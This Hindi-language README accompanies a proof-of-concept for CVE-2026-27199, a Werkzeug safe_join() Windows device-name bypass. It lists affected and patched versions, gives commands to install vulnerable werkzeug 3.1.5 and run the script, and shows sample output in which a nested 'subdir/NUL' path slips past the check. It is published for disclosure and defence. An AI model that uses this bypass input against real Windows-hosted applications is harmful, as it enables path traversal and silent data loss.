
CVE-2026-27199 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Werkzeug safe_join() Windows डिवाइस-नाम बायपास है, जो पाथ ट्रैवर्सल और साइलेंट डेटा डिस्कार्ड को प्रदर्शित करता है।
safe_join() विंडोज़ डिवाइस-नाम बाईपासस्थिति: सार्वजनिक रूप से खुलासा किया गया। werkzeug 3.1.6 में ठीक किया गया।
गंभीरता: मध्यम
रिपोर्टकर्ता: @alimezar
परामर्श: GHSA-29vq-49wr-vm6x
| पैकेज | प्रभावित | पैच किया गया |
|---|
| werkzeug | < 3.1.6 | 3.1.6 |
आवश्यकताएँ: विंडोज़, Python 3.8+,
werkzeug < 3.1.6
pip install "werkzeug==3.1.5"
python poc_CVE-2026-27199.py
============================================================
CVE-2026-27199 — Werkzeug safe_join() PoC
============================================================
[*] Werkzeug संस्करण : 3.1.5
[*] os.name : nt
[+] safe_join(base, 'NUL') -> None (सही ढंग से अवरुद्ध)
[!] safe_join(base, 'subdir/NUL') -> C:\...\subdir\NUL (बाईपास!)
[*] लौटाए गए पथ पर लिखने का प्रयास किया जा रहा है ...
[!] open(nested NUL) लिखें: सफल — डेटा डिवाइस द्वारा चुपचाप त्याग दिया गया
[!] कमजोर: इस इंस्टॉलेशन पर CVE-2026-27199 की पुष्टि हुई।
उपचार के लिए werkzeug >= 3.1.6 में अपग्रेड करें।
[+] safe_join(base, 'subdir/NUL') -> None (सही ढंग से अवरुद्ध)
[+] कमजोर नहीं: नेस्टेड डिवाइस नाम अवरुद्ध कर दिया गया था।
यह PoC जिम्मेदार खुलासे और सार्वजनिक पैच उपलब्धता के बाद शैक्षिक और रक्षात्मक उद्देश्यों के लिए प्रकाशित किया गया है।